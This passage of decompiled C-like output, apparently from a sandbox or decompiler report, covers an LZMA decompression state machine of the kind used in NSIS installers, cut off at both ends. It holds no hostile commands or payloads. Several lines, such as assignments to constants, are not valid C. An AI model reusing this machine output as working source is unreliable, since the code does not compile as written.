											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
